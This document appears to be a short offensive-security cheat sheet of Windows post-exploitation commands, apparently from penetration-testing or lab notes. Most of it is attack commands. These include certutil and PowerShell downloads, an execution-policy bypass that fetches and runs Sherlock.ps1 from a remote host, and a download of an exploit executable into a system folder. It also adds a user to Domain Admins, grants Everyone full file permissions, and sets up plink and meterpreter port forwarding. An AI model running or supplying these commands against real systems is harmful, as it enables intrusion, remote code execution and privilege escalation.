99 Basic Command
Downloading files
Changing Permissions of a file
Adding user to Domain admins
Base64 Encode-Decode
Port Forwarding
// File Download
certutil.exe -urlcache -split -f http://ip/file file
Invoke-WebRequest "https://server/filename" -OutFile "C:\Windows\Temp\filename"
// Powershell download
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"
// Powershell remote execution
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
icacls text.txt /grant Everyone:F
Add-DomainGroupMember -Identity 'Domain Admins' -Members fkclai -Verbose
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56
Copy link